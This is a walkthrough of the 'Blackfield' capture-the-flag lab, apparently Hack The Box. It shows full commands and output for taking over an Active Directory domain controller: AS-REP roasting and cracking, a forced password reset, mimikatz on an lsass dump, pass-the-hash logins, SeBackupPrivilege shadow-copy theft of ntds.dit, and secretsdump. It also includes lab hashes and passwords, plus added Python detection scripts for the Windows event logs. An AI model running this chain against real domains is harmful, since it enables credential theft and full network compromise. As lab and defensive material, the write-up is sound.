Blackfield


1. Opened ports:

```
# masscan -i tun0 10.10.10.192 -p0-65535 --rate 10000
Discovered open port 88/tcp on 10.10.10.192
Discovered open port 445/tcp on 10.10.10.192
Discovered open port 593/tcp on 10.10.10.192
Discovered open port 135/tcp on 10.10.10.192
53/udp open domain (generic dns response: SERVFAIL)
```
2. SMB listing:

```
# smbclient -L //10.10.10.192
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
forensic        Disk      Forensic / Audit share.
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
profiles$       Disk
SYSVOL          Disk      Logon server share

# smbclient //10.10.10.192/profiles$
smb: \> dir
  .                                   D        0  Wed Jun  3 16:47:12 2020
  ..                                  D        0  Wed Jun  3 16:47:12 2020
  AAlleni                             D        0  Wed Jun  3 16:47:11 2020
  ABarteski                           D        0  Wed Jun  3 16:47:11 2020
--[SNIP]--
```
3. Copy the usernames to a file users.txt and use them to request AS-REP hashes for any account that does not require Kerberos pre-authentication:

```
# GetNPUsers.py BLACKFIELD.local/ -usersfile users.txt -format hashcat -output hashes.asreproast -dc-ip 10.10.10.192
...
[*] Getting TGT for support
$krb5asrep$23$support@BLACKFIELD.LOCAL:422866063277e0f25f87931e6c192bba$cbe1cd7085635f4b1c527d3e42fe9d3a2417581bb24ba9ae75aa1cfceff09e071474aa7b535322575c06527cbd0afeaead168eb52488cd1ef4e81f231c1d5bee649b5eab98cb9c9a164330a254e2d4a4c80104f46a77aeb3aa108012546cda176a34eff1679fc4c72396e8c55b30b6ba79eece732dfd507830b5fba05544f8a31dd642c47f6fed69daaa5074cf6cddc212c71ca2a9718bf20039064025b911143e001e19f960d9d24a776df1edde005c0c2ec484c92dacb4c6495aa4b38547304efedbb60e341eeeee8217477a0b375a48ea86beb4552ec2b4e6cbbaf0d5976e6b5bf9c5478aff89bd7bf5bc3b420fc741fbd62d
```
4. Crack it:

```
# john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast
```
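What steps 3 and 4 look like from the domain controller's side, as an added example that is not part of the original writeup: every TGT request is logged as Security Event 4768, and an AS-REP handed out with PreAuthType 0 (no pre-authentication) and TicketEncryptionType 0x17 (RC4-HMAC) is exactly the crackable blob GetNPUsers.py collects. The event records below are constructed to mirror the 4768 EventData field names; the second half validates a `$krb5asrep$` line, which is handy after a hash has been re-joined from wrapped output.

```python
"""Detect AS-REP roasting in Windows Security 4768 records and validate the
resulting krb5asrep hash line (added example, constructed sample data)."""
import re
from collections import Counter

# Constructed 4768/4769 records; keys mirror the EventData element names.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "support", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "audit2020", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    # Normal logon: pre-auth type 2 (encrypted timestamp), AES256 ticket.
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "10.10.10.50",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    # Failed request for a name that does not exist (status 0x6): the noise a
    # username list produces when it is thrown at the KDC.
    {"EventID": 4768, "TargetUserName": "nosuchuser", "IpAddress": "10.10.14.5",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x6"},
    # Service-ticket request (4769) is a different event and must be ignored.
    {"EventID": 4769, "TargetUserName": "svc_backup", "IpAddress": "10.10.10.50",
     "PreAuthType": "-", "TicketEncryptionType": "0x17", "Status": "0x0"},
]

RC4_HMAC = "0x17"


def asrep_roast_candidates(events):
    """Return (user, source_ip) for every successful TGT issued without
    pre-authentication and encrypted with RC4: the AS-REP that hashcat mode
    18200 / john's krb5asrep format cracks offline."""
    return [
        (e["TargetUserName"], e["IpAddress"])
        for e in events
        if e.get("EventID") == 4768
        and e.get("Status") == "0x0"
        and e.get("PreAuthType") == "0"
        and e.get("TicketEncryptionType") == RC4_HMAC
    ]


def unknown_principal_counts(events):
    """Per-source count of 4768 failures with status 0x6 (client principal
    unknown); a burst from one IP is username enumeration against the KDC."""
    return Counter(
        e["IpAddress"] for e in events
        if e.get("EventID") == 4768 and e.get("Status") == "0x6"
    )


# hashcat 18200 / john krb5asrep layout:
#   $krb5asrep$<etype>$<user>@<REALM>:<32-hex checksum>$<hex enc-part>
ASREP_HASH_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<data>[0-9a-fA-F]+)$"
)


def parse_asrep_hash(line):
    """Validate a krb5asrep line and return its fields; None if malformed
    (wrong layout, checksum not 32 hex digits, or odd-length enc-part)."""
    m = ASREP_HASH_RE.match(line.strip())
    if not m or len(m["data"]) % 2:
        return None
    return {"etype": int(m["etype"]), "user": m["user"],
            "realm": m["realm"], "enc_part_bytes": len(m["data"]) // 2}


if __name__ == "__main__":
    for user, ip in asrep_roast_candidates(SAMPLE_EVENTS):
        print(f"AS-REP roastable account {user} requested from {ip}")
    print("unknown-principal failures per source:",
          dict(unknown_principal_counts(SAMPLE_EVENTS)))
```

Run against real data, the same two conditions translate directly into a SIEM query on 4768 (`PreAuthType=0 AND TicketEncryptionType=0x17`); the fix on the account side is clearing "Do not require Kerberos preauthentication" on the flagged users, and the 0x6 counter is the early warning that someone is feeding a username list to the KDC.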
5. Using the support account we can reset the password of audit2020 (see https://malicious.link/post/2017/reset-ad-user-password-with-linux/):

```
# rpcclient -U support //10.10.10.192
rpcclient $> setuserinfo2 audit2020 23 'ICanHaz1ChzBrger'
rpcclient $> quit

# smbclient.py audit2020@10.10.10.192
WORKS!!
```

6. Grab lsass.zip so the memory dump inside can be processed with mimikatz (see https://medium.com/@Ali.bawazeeer/using-mimikatz-to-get-cleartext-password-from-offline-memory-dump-76ed09fd3330):

```
mimikatz # sekurlsa::minidump lsass.DMP
mimikatz # sekurlsa::logonPasswords full
```

1. Using the found hash I can log in with evil-winrm as svc_backup:

```
# evil-winrm -H 9658d1d1dcd9250115e2205d9f48400d -u svc_backup -i 10.10.10.192
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..\Desktop
```

2. Time to privesc:

```
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all
```
3. While enumerating you will find notes.txt, and since svc_backup has backup ability (SeBackupPrivilege), robocopy in backup mode (/B) can copy it regardless of the file's ACL:

```
*Evil-WinRM* PS C:\Documents and Settings\Administrator\Desktop> robocopy C:/Users/Administrator/Desktop/ C:\Temp\ /B
100%
*Evil-WinRM* PS C:\Temp\> type notes.txt
```

4. We have to create a shadow copy to get the secrets. Save the following as diskshadow.txt and leave a trailing space at the end of every line, or else it will not work:

```
set context persistent nowriters
add volume c: alias tester
create
expose %tester% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\temp\4thelolz\ntds.dit
delete shadows volume %tester%
reset
```

```
*Evil-WinRM* PS C:\> diskshadow /s diskshadow.txt
```

The exec line may not work; if it fails, ignore it, make sure z: exists, and if it does you can continue with the next step.

5. Now upload SeBackupPrivilegeCmdLets (https://github.com/giuliano108/SeBackupPrivilege.git) and collect the items for secret extraction:

https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll?raw=true
https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll?raw=true

```
*Evil-WinRM* PS C:\Temp\> upload /a/place/for/tools/SeBackupPrivilegeCmdLets/
*Evil-WinRM* PS C:\Temp\> cd SeBackupPrivilegeCmdLets
*Evil-WinRM* PS C:\Temp\SeBackupPrivilegeCmdLets> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Temp\SeBackupPrivilegeCmdLets> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Temp\SeBackupPrivilegeCmdLets> Set-SeBackupPrivilege
*Evil-WinRM* PS C:\Temp\SeBackupPrivilegeCmdLets> Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\4thelolz\ntds.dit
*Evil-WinRM* PS C:\Temp\SeBackupPrivilegeCmdLets> reg save hklm\system C:\temp\4thelolz\system.bak
```
6. Send the artifacts to the attack box:

```
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color\> download ntds.dit
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color\> download system.bak
```

7. Dump the secrets:

```
# secretsdump.py -ntds ntds.dit -system system.bak LOCAL
```
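Steps 3 to 7 above leave a very recognisable trail in process-creation telemetry. As an added example that is not part of the original writeup, the script below triages Security Event 4688 records (with command-line auditing enabled; Sysmon Event 1 carries the same fields) for the four distinctive commands in that chain: robocopy in backup mode, diskshadow driven by a script file, `reg save` of the SYSTEM hive, and any command line that names ntds.dit. One hit is a lead; several distinct hits by the same account is the whole extraction chain. The records are constructed and mirror the 4688 EventData field names.

```python
"""Triage 4688 process-creation records for the SeBackupPrivilege /
shadow-copy / ntds.dit extraction chain (added example, constructed data)."""
import re
from collections import defaultdict

# Rule name -> pattern over the full command line (case-insensitive).
RULES = [
    ("robocopy_backup_mode", re.compile(r"\brobocopy(?:\.exe)?\b.*\s/b\b", re.I)),
    ("diskshadow_script", re.compile(r"\bdiskshadow(?:\.exe)?\b.*\s/s\s", re.I)),
    ("reg_save_system_hive", re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\system\b", re.I)),
    ("ntds_dit_reference", re.compile(r"ntds\.dit", re.I)),
]

# Constructed 4688 records (plus one unrelated 4624) mirroring EventData names.
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy C:/Users/Administrator/Desktop/ C:\Temp\ /B"},
    {"EventID": 4688, "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow /s diskshadow.txt"},
    {"EventID": 4688, "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c copy z:\windows\ntds\ntds.dit c:\temp\4thelolz\ntds.dit"},
    {"EventID": 4688, "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\system C:\temp\4thelolz\system.bak"},
    # Benign: an ordinary robocopy mirror without /B, run by another user.
    {"EventID": 4688, "SubjectUserName": "jdoe",
     "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy C:\Users\jdoe\Documents D:\backup /E"},
    # Not a process-creation event; must be skipped.
    {"EventID": 4624, "SubjectUserName": "jdoe"},
]


def match_rules(command_line):
    """Names of every rule whose pattern matches the given command line."""
    return [name for name, rx in RULES if rx.search(command_line or "")]


def triage(events):
    """Every 4688 record that trips at least one rule, with the rules it hit."""
    hits = []
    for e in events:
        if e.get("EventID") != 4688:
            continue
        names = match_rules(e.get("CommandLine", ""))
        if names:
            hits.append({"user": e["SubjectUserName"], "rules": names,
                         "cmd": e["CommandLine"]})
    return hits


def chained_users(events, min_distinct_rules=3):
    """Accounts that tripped at least min_distinct_rules different rules: a
    single robocopy /B is a lead, robocopy + diskshadow + reg save + ntds.dit
    from one account is the complete NTDS extraction chain."""
    seen = defaultdict(set)
    for h in triage(events):
        seen[h["user"]].update(h["rules"])
    return {u for u, rules in seen.items() if len(rules) >= min_distinct_rules}


if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        print(f"{h['user']:<12} {','.join(h['rules']):<22} {h['cmd']}")
    print("full-chain accounts:", chained_users(SAMPLE_EVENTS))
```

The account-level aggregation is the useful part: a backup operator legitimately running robocopy /B is common, but the same non-admin account also spawning diskshadow from a script and saving the SYSTEM hive within one session is not. The underlying control is keeping SeBackupPrivilege (Backup Operators membership) off accounts that can reach the domain controller interactively or over WinRM.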
8. Connect with evil-winrm as administrator using the hash:

```
# evil-winrm -H 184fb5e5178480be64824d4cd53b99ee -u administrator -i 10.10.10.192
```

Using lsassy we can get the cleartext password and then NT Authority\System:

```
# lsassy -d BLACKFIELD.LOCAL -u Administrator -H 184fb5e5178480be64824d4cd53b99ee 10.10.10.192 -m 0 --procdump /opt/Sysinternals/procdump.exe --dumpert /opt/Sysinternals/dumpert.exe
[10.10.10.192] BLACKFIELD\Administrator 184fb5e5178480be64824d4cd53b99ee
[+] [10.10.10.192] BLACKFIELD.local\Administrator ###_ADM1N_3920_###
```

NT Authority\System:

```
# psexec.py Administrator:###_ADM1N_3920_###@10.10.10.192
# evil-winrm -p "###_ADM1N_3920_###" -u administrator -i 10.10.10.192
```

A full dump can be done:

```
# secretsdump.py -just-dc-ntlm BLACKFIELD.LOCAL/administrator:"###_ADM1N_3920_###"@10.10.10.192 -use-vss
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
```
